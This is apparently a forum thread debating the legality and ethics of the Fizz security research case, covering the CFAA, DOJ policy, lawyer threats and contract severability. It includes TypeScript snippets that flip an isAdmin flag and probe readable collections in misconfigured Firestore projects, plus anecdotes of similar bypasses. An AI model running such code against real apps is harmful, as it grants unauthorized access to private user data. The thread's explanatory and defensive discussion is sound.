I'm not a lawyer, but I am professionally interested in this weird branch of the law, and it seems like EFF's staff attorney went a bit out on a limb here:
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database access they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplated retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession from the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
A friend points out that the limb EFF was out on was sturdy indeed, since DOJ has issued a policy statement saying they're not going after good-faith security research.
To me that reads less as "this is legal" and more as "this is illegal, but we (the executive branch of the government) will be nice and not go after you for it as long as we think you're a good guy". That's (arguably) better than nothing, but not exactly an ideal way to structure our justice system in my opinion.
Fizz may have violated more than a state bar rule; this could very well be extortion (depending).
I would tend to agree with the balance of your comments.
So then you’d concede that all that’s left is these Fizzbuzz people are liars and are bad people, and that their product is crap and should not be used, and you don’t need to have personally used the app nor met them personally to know any of that, since it’s all clear from their extremely obnoxious, self destructive conduct, and that that’s just an opinion and not a forecast on whether or not their useless investors will get a return?
> this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplated retaining a forensics firm or truing things up with their insurers, who probably did not exist
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought the need for them to the company's attention. If you've been operating a publicly available service with a serious vulnerability, you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they had discovered the vulnerability themselves, ideally before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
A forensics investigation is usually required by insurers. It's not an arbitrary amount of money, it's just an amount you're not happy with. I understand why you feel that way, but it's not the way the law works.
I presume that the "limb" the EFF attorney went on is basically what would've been disputed in a court of law. It's easily argued that if an app is so badly configured that just _following the Firebase protocol_ can give you write access to the database, you haven't actually circumvented any security measures, because _there weren't any to circumvent_.
It reminds me of the case where AT&T had their iPad subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
He ended up in prison.
(The conviction was later overturned on a jurisdictional detail, but I think he spent several months in federal prison.)
IANAL, but the law does not require you to "circumvent" anything[1].
Simply, anyone who "accesses a computer without authorization ... and thereby obtains ... information from any protected computer" is in violation of the CFAA.
If the researchers in question did not download any customer data, nor cause any "damages", I am not sure they are guilty of anything. BUT, if they had, "the victim had insufficient security measures" is not a valid defense. These researchers were not authorized to access this computer, regardless of whether they were technically able to obtain access.
Leaving your door unlocked does not give burglars permission to burgle you.
[1] https://www.law.cornell.edu/uscode/text/18/1030
Not a lawyer ofc, but I would not expect that line of reasoning to hold up in court as I wouldn't expect "the door was unlocked, your honor" to excuse trespassing.
That's not how CFAA works. Under CFAA if there was anything to indicate that permission is required to access the system, then that's enough even if no actual security features were implemented.
Good analysis. I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
While what you say is true, I feel strongly that it shouldn't be. It is morally right to show that a product used by many fellow students and marketed as "100% secure"* is in fact very vulnerable.
If some less ethical hackers got a hold of that data, much worse things could have happened.
* that's the biggest red flag. A company saying 100% obviously has very little actual security expertise.
PS: I'm a big fan of Germany's https://www.ccc.de/en/ who have pulled many such hacks against some of the biggest tech companies.
A security researcher checking on Firestore permissions is basically the equivalent of an electrician walking into a grocery store and noticing sparking wires dangling and taped awkwardly, and imminent fire hazards that could result in catastrophic damages to people shopping at the store.
It is absolutely the right, and IMO, the duty, of security researchers to test every website, app, product and service that they use regularly to ensure the continued safety of the general public. This is too important of a field to have a "not my problem" attitude of just ignoring egregious security vulnerabilities so they can be exploited by criminals.
> I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
I was looking for a comment like this. You couldn't pay me enough to do this sort of thing in this day and age (unless working for a DoD or 3-letter agency contractor, which would have my back covered), nevermind to do it pro bono or bona fide or whatever it is that these guys had in mind (either way, it looks like they were not paid to do it).
This sort of action might still have been sort of ok-ish in the late '00s, maybe going into 2010, 2011, but when the Russian/Chinese/North Korean/Iranian cyber threats became real (plus the whole Snowden fiasco), related laws began to change (both in the US and in Europe), and doing this sort of stuff with no one to back you up for real (forget the EFF) meant that the one doing it would be asking for trouble in a big way.
The question isn't whether it should be done, but whether it should be done anonymously or openly.
TL;DR: it was good faith security research, and the US DoJ doesn't prosecute that.
Because bug bounties?
What about due diligence? If you're about to send and store sensitive information with a service, a service that claims to be 100% secure.... shouldn't you have the right to verify that the security is up to snuff? These researchers weren't attempting to harm anybody. What's wrong with kicking the tires?
It’s both sane and welcome. The alternative to unsolicited testing is your app getting owned, your customer data being sold, and you being sued into oblivion. Unsolicited.
Your vulnerability doesn’t cease to exist because you don’t want people to look at it.
Good analysis. One important caveat is that, while this may technically have been a CFAA violation, it's almost certainly not one the Department of Justice would prosecute.
Last year, the department updated its CFAA charging policy to not pursue charges against people engaged in "good-faith security research." [1] The CFAA is famously over-broad, so a DOJ policy is nowhere near as good as amending the law to make the legality of security research even clearer. Also, this policy could change under a new administration, so it's still risky—just less risky than it was before they formalized this policy.
[1] https://www.justice.gov/opa/pr/department-justice-announces-...
> If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
I am extremely not a lawyer, but the pattern of legal posturing I've observed is that some lawyer makes grand over-reaching statements, and the opposing lawyer responds with their own grand over-reaching statements.
"My clients did not violate the CFAA" should logically be interpreted as "good fucking luck arguing that my good faith student security researcher clients violated the CFAA in court".
I don't think you have the pattern of facts correct (unless you have access to more information than what is in the linked Stanford Daily article).
> At the time, Fizz used Google’s Firestore database product to store data including user information and posts. Firestore can be configured to use a set of security rules in order to prevent users from accessing data they should not have access to. However, Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly and access a significant amount of sensitive user data.
> We found that phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information. It was possible to identify the author of any post on the platform.
So AFAICT there is no indication they created any admin accounts to access the data. This is yet another example of an essentially publicly accessible database that holds what was supposed to be private information. This seems like a far less clear application of the CFAA than the pattern of facts you describe.
Really what happened is we checked whether we could set `isAdmin` to `true` on our existing accounts, and... we were able to. Adi's more technical writeup has details: https://saligrama.io/blog/post/firebase-insecure-by-default/
Ignoring the legalities of it all, this step crosses a line morally imo.
I think intent matters for actually securing an indictment and conviction; if, for example, they can prove that you exfiltrated their user data (this happened to Weev, who noticed an ordinal ID in a URL and enumerated all possible URLs), they could actually get the feds to bust you. But you're right, if they're big enough they could try to come after you regardless, at the risk of turning the security research community against them.
I'm not a lawyer, so I'm pretty sure what I'm about to say wouldn't hold up in a court of law, but if you claim your system is 100% secure, and then someone hacks it, I think by definition you are allowed to be there and not subject to the CFAA. In a 100% secure system you can't get into anything you're not allowed to, so if you're accessing something, you are, by definition, allowed to.
We all know there is no such thing as something 100% secure, but if you're gonna go making wild claims, you should have to stand by them.
To your point in #2: this can create a murky and risky situation for the party being reviewed. Particularly if you’re small and you are trying to land your first big client that asks questions like “have you previously been compromised?” then your answer now depends on the definition of compromised.
Even if you are engaged in legitimate security research, it is highly unethical and unprofessional to willfully exceed your engagement limits. You may not even know the full reasoning of why those limits are established.
I don't understand why in both contracts and legal communication (particularly threatening ones), there is little to no consequence for the writing party if they get things wrong.
I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract". The employer is basically trying to enforce their rules (reasonable), but they have no negative consequences if what they write is not allowed. At most a court deems that piece invalid, but that's it. The onus is on the reader to know (which tends to be a much weaker party).
Same here. Why can a company send a threatening letter ("you'll go 20 years to federal prison for this!!"), when it's clearly false? Shouldn't there be an onus on the writer to ensure that what they write is reasonable? And if it's absurdly and provably wrong, shouldn't there be some negative consequences more than "oh, nevermind"?
> I've seen examples of an employee contract, with things like "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
This concept of severability exists in basically all contracts, and is generally limited to sections that are not fundamental to the nature of the agreement. (The extent of what qualifies as fundamental is, as you said, up to a court to interpret.)
In your specific example of an employee contract, severability actually protects you too, by ensuring all the other covenants of your agreement - especially the ones that protect you as the individual - will remain in force even if a sub section is invalidated. Otherwise, if the whole contract were invalidated, you'd be starting from nothing (and likely out of a job). Some protections are better than zero.
In a right-to-work state, what protections can an individual realistically expect to receive from a contract?
> "if any piece of this contract is invalid it doesn't invalidate the rest of the contract".
Severability (the ability to "sever" part of a contract, leaving the remainder intact so long as it's not fundamentally a change to the contract's terms) comes from constitutional law and was intended to prevent wholesale overturning of previous precedent with each new case. It protects both parties from squirreling out of an entire legal obligation on a technicality, or writing poison pills into a contract you know won't stand up to legal scrutiny.
If part of the contract is invalidated, they can't leverage it. If that part being invalidated changes the contract fundamentally, the entire contract is voided. What more do you want?
It seems like you're arguing for some sort of punitive response to authoring a bad contract? That seems like a pretty awful idea re: chilling effect on all legal/business relationship formation, and wouldn't that likely impact the weaker parties worse as they have less access to high-powered legal authors? That means that even negotiating wording changes to a contract becomes a liability nightmare for the negotiators, doesn't that make the potential liability burden even more lopsided against small actors sitting across the table from entire legal teams?
I guess I'm having trouble seeing how the world you're imagining wouldn't end up introducing bigger risk for weaker parties than the world we're already in.
Practical example: your employment agreement has a non-compete clause. If 3 years later non-competes are no longer allowed in employment contracts, you won’t want to be suddenly unemployed because your employment contract is no longer valid.
You’ll want the originally negotiated contract, minus the clause that can’t be enforced.
Thanks for the explanation and the term "severability". I understand its point now and it makes sense to have it conceptually. I also didn't know about this part:
> so long as it's not fundamentally a change to the contract's terms
However, taken down one notch from theoretical to more practical:
> It seems like you're arguing for some sort of punitive response to authoring a bad contract?
Not quite so bluntly, but yes. There's obviously a gray area here. So not for mistakes or subtle technicalities. But if one party is being intentionally or absurdly overreaching then yes, I believe there should be some proportional punishment.
Particularly if the writing party's intent is to scare the other side into inaction, rather than to express a genuine belief that their wording is true.
The way I think of it is maybe in similar terms as disbarring or something like that. So not something that would be a day-to-day concern for honest people doing honest work, but some potential negative consequences if "you're taking it too far" (of course this last bit is completely handwavy).
Maybe such a mechanism exists that I'm not aware of.
There is obviously such a thing as going too far, but it's kind of hard to draw a clear line. In a good faith context, laws and precedents can change quickly, sometimes based on the whim of a judge, and there are many areas of law where there is no clear precedent or where guidance is fuzzy. In those cases, it's important to have severability so that entire contracts don't have to be renegotiated because one small clause didn't hold up in court.
Imagine an employment contract that contains a non-compete clause (ignore, for a moment, your personal beliefs about non-compete clauses). The company may have a single employment contract that they use everywhere, and so in states where non-competes are illegal, the severability clause allows them to avoid having separate contracts for each jurisdiction. And now suppose that a state that once allowed non-competes passes a law banning them: should every employment contract with a non-compete clause suddenly become null and void? Of course not. That's what severability is for.
In the case in the OP, it's hard to say what the context is of the threat, but I imagine something along the lines of, "Unauthorized access to our computer network is a federal crime under statute XYZ punishable by up to 20 years in prison." Scary as hell to a layperson, but it's not strictly speaking untrue, even if most lawyers would roll their eyes and say that they're full of shit. Sure, it's misleading, and a bad actor could easily take it too far, but it's hard to know exactly where to draw the line if lawyers couch a threat in enough qualifiers.
At the end of the day, documents like this are written by lawyers in legalese that's not designed for ordinary people. It's shitty that they threatened some college students with this, and whatever lawyer did write and send this letter on behalf of the company gave that company tremendously poor advice. I guess you could complain to the bar, but it would be very hard to make a compelling case in a situation like this.
(This is also one of the reasons why collective bargaining is so valuable. A union can afford legal representation to go toe to toe with the company's lawyers. Individual employees can't do that.)
Does it have to be this way?
It's a balance between encouraging people to stand up for their rights on one hand and discouraging filing of frivolous lawsuits on the other. The American system is "everyone pays their own legal fees", which encourages injured parties to file. The U.K. on the other hand is a "loser pays both parties' legal fees" (generally), which discourages a lot of plaintiffs from filing, even when they have been significantly harmed.
There can be consequences, but you have to be able to demonstrate you have been harmed. So, in what way have you been harmed by such a threat, and what is just compensation? How much will it cost to hire a lawyer to sue for compensation, and what are your chances of success? These are the same kinds of questions the entity sending the threatening letter asked themselves as well. If you think it is unfair because they have more resources, well that is more of a general societal problem - if you have more money you have access to better justice in all forms.
I recently got supremely frustrated by this in civil litigation. The claimant kept filing absolute fictional nonsense with no justification, and I had to run around trying to prove these things were not the case and racking up legal fees the whole time. Apparently you can just say whatever you want.
That's not the language they use. It will be more like "your actions may violate (law ref) and if convicted, penalties may be up to 20 years in prison." And how do you keep people from saying that? It's basically a statement of fact. If you have a problem with this, then your issue is with Congress for writing such a vague law.
“[the security researchers] may be liable for fines, damages and each individual of the [security research] Group may be imprisoned… Criminal penalties under the CFAA can be up to 20 years depending on circumstances.”
“the Group’s actions are also a violation of Buzz’s Terms of Use and constitute a breach of contract, entitling Buzz to compensatory damages and damages for lost revenue.”
“the Group’s agreement to infiltrate Buzz’s network is also a separate offense of conspiracy, exposing the Group to even more significant criminal liability.”
Emphasis added. The language is quite a bit more forceful and threatening than you make it out to be. Given that they were issuing these threats as an ultimatum, a "keep quiet about this or else...", it was likely a violation of California State Bar's rules of professional conduct.
They threaten that if they receive written confirmation that the researchers won't discuss the security issues, they won't pursue charges.
The lawyers were very much not "for your information, you could be liable for x if someone responded poorly"; they were in fact responding poorly.
No, you are talking about criminal law. What OP is talking about is severability, which exists so that if a judge determines Clause X violates the law, they can still (attempt to) enforce the rest of the contract if X can be easily remedied. I.e., the contract says no lunch breaks but CalOSHA regulations say 30 minutes are required; the contractor can't invalidate the contract in its entirety, they just take the breaks and amend the contract if the employer pushes it.
I disagree with OP - a judge can always choose to invalidate a contract, regardless of severability. It is in there for the convenience of the parties, and I've not heard of it being used in bad faith.
"That's not the language they used. They simply admired your place of business and reflected on what a shame it would be if a negative event happened to it. How would you keep people from saying that? It's basically a statement of fact..."
Because contract law mostly views things through the lens of property rights. Historically those with the most property get the most rights, so they're able to get away with imposing wildly asymmetrical terms on the implicit basis that society will collapse if they're not allowed to.
These guys (at least according to the angry letter) went beyond reasonable safe harbor for security researchers. They created admin accounts and accessed data. Definitely not clearly false that there's no liability here. Probably actually true.
IANAL, but the letter is borderline extortion/blackmail. Threatening to report an illegal activity unless the alleged perpetrator does something to your advantage can be extortion/blackmail AFAIK.
I feel like this article reflects an overall positive change in the way disclosure is handled today. Back in the 90s this was the sort of thing every company did. Companies would threaten lawsuits, or disclosure in the first place seemed legally dubious. Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
Sure, you still get some of that today from an especially old-fashioned company, or in this case from naive college students, but overall things have shifted quite dramatically in favor of disclosure. Dedicated middlemen who protect security researchers' identities, large enterprises encouraging and celebrating disclosure, six-figure bug bounties; even the laws themselves have changed to be more friendly to security researchers.
I'm sure it was quite unpleasant to go through this for the author, but it's a nice reminder that situations like this are now somewhat rare, whereas they used to be the norm (or worse).
The problem is that it is still entirely illegal to do this kind of hacking without any permission.
The fact that a lot of companies have embraced bug bounties and encourage this kind of stuff against them unfortunately teaches "kids" that this kind of thing is perfectly legal/moral/ethical/etc.
As this story shows though you're really rolling the dice, even though it worked out in this case.
> Discussions in forums / BBS's would be around if it was safe to disclose at all. Suggestions of anonymous email accounts and that sort of thing.
This is probably still a better idea if you don't have the cooperation of the target of the hack via some stated bug bounty program. But that doesn't help the security researcher "make a name" for themselves.
And you're basically admitting to the fact that you trespassed, even if all you did was the equivalent of walking through an unlocked door and verifying that you could look inside their refrigerator.
The fact that it may play out in the court of public opinion that you were helping to expose the lies of a corporation doesn't change the fact that in the actual courts you are guilty of a crime.
This is still the way to go even in many western countries.
Yeah, when it comes to cyber-security, we put our national security at risk so companies can avoid being embarrassed. (See my rant in another comment.)
I wonder if this was the students' attempt to protect their future careers as much as anything—"keep quiet about this or else"—especially given the issues were quickly fixed. In that sense it differs from the classic 90s era retaliation. From the students' POV it was probably quite terrifying. I wouldn't discount intervention by wealthy parents either, but of course I know nothing of the situation or the people involved.
Crazy story. The Stanford Daily article has copies of the lawyer letters back and forth; they are intense, and we wouldn't be able to read them if the EFF hadn't stepped up.
The Stanford Daily article says “At the time, Fizz used Google’s Firestore database product to store data including user information and posts...Fizz did not have the necessary security rules set up, making it possible for anyone to query the database directly...phone numbers and/or email addresses for all users were fully accessible, and that posts and upvotes were directly linkable to this identifiable information....Moreover, the database was entirely editable — it was possible for anyone to edit posts, karma values, moderator status, and so on."
This is unfortunately a very common issue with Firebase apps. Since the client is writing directly to the database, usually authorization is forgotten and the client is trusted to only write to their own objects.
A long time ago I was able to get admin access to an electric scooter company by updating my Firebase user to have isAdmin set to true, and then I accidentally deleted the scooter I was renting from Firebase. I am not sure what happened to it after that.
So this is entirely on the dev team to blame.
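To make the failure mode concrete, here is a minimal, hypothetical sketch of the pattern being described: a Firestore project whose rules still allow client writes, driven straight from the browser with the public web config. The project config, collection name, and `isAdmin` field below are all invented for illustration, not Fizz's or the scooter company's actual schema.

```typescript
// Hypothetical sketch: with permissive (or leftover dev-mode) security rules,
// any client holding the app's public web config can rewrite its own user
// document, including privileged fields. All identifiers are invented.
import { initializeApp } from "firebase/app";
import { getAuth, signInAnonymously } from "firebase/auth";
import { doc, getFirestore, setDoc } from "firebase/firestore";

// The web config ships inside every frontend bundle, so it is not a secret.
const app = initializeApp({
  apiKey: "public-api-key",
  projectId: "example-project",
  appId: "1:1234567890:web:abcdef",
});

async function becomeAdmin(): Promise<void> {
  // Sign in with whatever auth the app exposes; anonymous auth is used here
  // only for brevity (it assumes the project has it enabled).
  const { user } = await signInAnonymously(getAuth(app));

  // If no rule restricts writes to /users/{uid}, this merge succeeds silently,
  // flipping a flag the backend presumably trusts.
  await setDoc(
    doc(getFirestore(app), "users", user.uid),
    { isAdmin: true },
    { merge: true }
  );
  console.log(`user ${user.uid} now has isAdmin=true`);
}

becomeAdmin().catch(console.error);
```

The fix is what the surrounding comments describe: security rules that scope reads and writes to the authenticated user, deny by default, and treat privileged flags like isAdmin as server-managed only.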
One interesting thing about the statute of limitations is “the discovery rule.”
For example, say the statute of limitations for 18 USC 1030 is two years. If a person hypothetically stole a scooter by hacking, two years later, they would be in the clear, right?
No. The discovery rule says that if a damaged party, for good reason, does not immediately discover their loss, the statute of limitations is paused until they do.
Accordingly, if the scooter company read a post today about a hack that happened “a long time ago” and therein discovered their loss, the statute of limitations would begin to tick today and the hacker could be in legal jeopardy for two more years.
It is common. But before you curse at Google here: this is VERY well documented. When you create a database, the UI screams at you that it's in dev mode, that security has not been set up, etc. If you keep ignoring it, the database will eventually close itself down automatically.
Which is why I hate that people keep claiming that you don't need to know what you are doing nor employ anyone who knows what they are doing to setup infrastructure. You might be able to stand things up without knowing what you are doing, but you probably shouldn't be running it in production that way.
If I recall correctly, you can set your Firebase rules such that a user can only read/write/delete certain collections based on conditions such as user.email == collection.email.
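For what it's worth, that kind of condition lives in the project's Firestore security rules rather than in application code. A minimal sketch, with made-up collection and field names (not Fizz's actual rules), might look like this:

```
rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    // Each user may only touch their own document.
    match /users/{userId} {
      allow read, write: if request.auth != null
                         && request.auth.uid == userId;
    }
    // The email-based check from the comment above would be written as:
    //   allow read: if request.auth.token.email == resource.data.email;

    // Deny everything not explicitly allowed.
    match /{document=**} {
      allow read, write: if false;
    }
  }
}
```

Without rules along these lines (the time-limited "test mode" default eventually expires, but a blanket allow-if-true rule never does), every collection is effectively public to anyone holding the app's client config.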
A few years ago I found that HelloTalk (a language learning pen-pal app) stored the actual GPS coordinates of users in a SQLite file that you can find in your iOS backup. The maps in-app showed only a general location (the pin disappeared at a certain zoom).
You could also bypass the filter preventing you from searching for over-18 users if you are under 18 (and under-18 users if you are over), as well as paid-only filters like location, gender, etc., by rewriting the requests with mitmproxy (paid status is not checked server-side).
Speaking of, are there tools to audit/explore firebase/firestore databases i.e. see if collections/documents are readable?
I imagine a web tool that could take the app id and other api values (that are publicly embedded in frontend apps), optionally support a session id (for those firestore apps that use a lightweight “only visible to logged in users” security rule) and accept names of collections (found in the js code) to explore?
[1] https://github.com/iosiro/baserunner
[2] https://saligrama.io/blog/post/firebase-insecure-by-default/
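Beyond the tools linked above, a rough sketch of such a probe with the standard Firebase web SDK might look like the following. The config values and collection names are placeholders you would pull out of the target app's frontend bundle, and, as the rest of this thread makes clear, pointing this at a service you don't own or have permission to test is legally fraught.

```typescript
// Rough sketch: try to read a few documents from guessed collection names using
// only the app's public client config, and report whether the rules allow it.
// All values below are placeholders, not a real project.
import { initializeApp } from "firebase/app";
import { collection, getDocs, getFirestore, limit, query } from "firebase/firestore";

const db = getFirestore(
  initializeApp({
    apiKey: "public-api-key",     // copied from the frontend bundle
    projectId: "example-project", // placeholder
  })
);

async function probe(name: string): Promise<void> {
  try {
    const snap = await getDocs(query(collection(db, name), limit(3)));
    console.log(`${name}: readable (${snap.size} sample documents returned)`);
  } catch (err) {
    console.log(`${name}: denied (${(err as Error).message})`);
  }
}

async function main(): Promise<void> {
  // Collection names are typically recovered by reading the app's JS, as the
  // comment above suggests; these are examples only.
  for (const name of ["users", "posts", "upvotes"]) {
    await probe(name);
  }
}

main();
```

For apps that gate reads behind an auth check (the "only visible to logged in users" rule mentioned above), you would sign in first, for example anonymously, before probing.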
Interestingly, Ashton Cofer and Teddy Solomon of Fizz tried some PR damage control when their wrongdoing came to light https://stanforddaily.com/2022/11/01/opinion-fizz-previously.... Their response was weak and it seems like they've refused to comment on the debacle since then.
That's wild!
Per the Stanford Daily article linked in the OP [0], they have also removed the statement addressing this incident and supposed improvements from their website.
>Although Fizz released a statement entitled “Security Improvements Regarding Fizz” on Dec. 7, 2021, the page is no longer navigable from Fizz’s website or Google searches as of the time of this article’s publication.
And, it seems likely the app still stores personally identifiable information about its "anonymous" users' activity.
> Moreover, we still don’t know whether our data is internally anonymized. The founders told The Daily last year that users are identifiable to developers. Fizz’s privacy policy implies that this is still the case
I suppose the 'developers' may include the same founders who have refused to comment on this, removed their company's communications about it, and originally leveraged legal threats over being caught marketing a completely leaky bucket as a "100% secure social media app." Can't say I'm in a hurry to put my information on Fizz.
https://web.archive.org/web/20220204044213/https://fizzsocia...
What I was looking for was if they really had a page that claimed "100% secure", but I don't think that was captured by archive.org
Your sentiment is silly. In general, with important caveats I will not state here, you can of course voice a threat to do an action that is legal (file a lawsuit), and may not voice a threat to do an action that is illegal (physical assault).
I'm not even suggesting it has to happen at a legal level, but perhaps at a professional level; I would think any lawyer writing baseless threatening letters to people should be subject to losing their license.
IANAL, but in some jurisdictions and circumstances I understand that threatening someone with criminal prosecution can itself constitute the crime of extortion or abuse of process.
It's only legal to use the legal action, period. Once you pull in a THREAT, it becomes blackmail/extortion.
1. Threatening violence is explicitly a crime.
2. At a higher level, threatening violence is a crime because the underlying act (committing violence) is also a crime. Threatening to do a legal act is largely legal; it's not illegal to threaten reporting to the authorities, for instance.
It absolutely can be illegal, in the case of extortion. If you say "do this or I turn you in", that's extortion.
Perfectly legal, but unethical. The motives are clear, they want to threaten/bully someone into silence who has information that could hurt their business. I don't think lawyers that engage in this behavior should be allowed to practice law, that's all.
> And at the end of their threat they had a demand: don’t ever talk about your findings publicly. Essentially, if you agree to silence, we won’t pursue legal action.
Legally, can this cover talking to e.g. state prosecutors and the police as well? Because claiming to be "100% secure" while knowing you are not secure, and that your users have no protection against spying from you or any minimally competent hacker, is fraud at minimum, but closer to criminal wiretapping, since you're knowingly tricking your users into revealing their secrets on your service, thinking they are "100% secure".
That this ended "amicably" is frankly a miscarriage of justice - the Fizz team should be facing fraud charges.
They could not have been ignorant of storing non-anonymous, plain-text messages. Even if we don't count that as insecure, they can only appeal to ignorance/negligence up until the point the security researchers informed them of their vulnerabilities.
After that, that they continued their "100% secure" marketing on one side, while threatening researchers into silence on the other, is plainly malicious.
I don't think the demands of Fizz have much legal standing.
We care more about corporations than citizens in the US. Advertising in the US is full of false claims. We ignore this because we pretend like words have no meaning.